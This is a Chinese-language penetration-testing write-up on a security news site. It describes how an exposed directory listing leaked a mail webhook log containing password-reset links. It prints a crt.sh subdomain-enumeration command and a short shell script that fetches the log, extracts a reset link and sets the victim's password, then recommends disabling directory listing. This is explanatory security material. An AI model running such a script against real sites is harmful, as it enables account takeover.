當前位置:
首頁 > 新聞 > 滲透測試實戰:利用列目錄漏洞重置密碼

滲透測試實戰:利用列目錄漏洞重置密碼

列目錄是最常見的錯誤配置之一,列目錄漏洞到底影響多嚴重,取決於關鍵性文件的出現。

最近,我在滲透測試中,我遇到了一個有趣的目錄列表,並且可以利用它。通過枚舉,我發現了一個子域,這是分段伺服器,並可以通過互聯網訪問。

[nishaanthguna:~/essentials]$ curl --silent https://crt.sh/?q=%.domain.com | sed "s/]+>//g" | grep -i domain.com | tail -n +9 | cut -d ">" -f2 | cut -d "

www.domain.com

blog.domain.com

stag.domain.co

在進行埠掃描時,發現埠8080已打開,並有一個目錄列表,我發現有個log日誌。

從log中,我發現日誌不僅泄露了個人和開發人員的電子郵件地址,還有重置密碼鏈接。像這樣的東西。

日誌文件中,可能出現這樣的功能場景:

2.受害者點擊發送到他們的電子郵件地址的鏈接。

3.攻擊者獲取密碼重置令牌,因為目錄列表並重置密碼。

我寫了一個快速的腳本來查看mailgun-webhook.log文件,搜索重置鏈接並自動重置密碼。

curl https://domain.com/mailgun-webhook.log | tee direct.txt

if grep -Fxq "reset" direct.txt

then

echo "[+]Found a Password Reset link"

link=$(cat direct.txt | grep -i reset | cut -d "," -f6 |

cut -d "" -f1 | head -n 1)

curl "$link"-H "User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_6)"

--data "password=testpassword%21%21&confirmation=testpassword%21%21" --compressed

echo "[+]Password changed to testpassword!!"

else

echo "[-]Reset link not found"

fi

建議禁用目錄列表,不要以明文形式存儲敏感信息,例如憑證,密碼重置鏈接,API密鑰。


喜歡這篇文章嗎?立刻分享出去讓更多人知道吧!

本站內容充實豐富,博大精深,小編精選每日熱門資訊,隨時更新,點擊「搶先收到最新資訊」瀏覽吧!


請您繼續閱讀更多來自 嘶吼RoarTalk 的精彩文章:

TAG:嘶吼RoarTalk |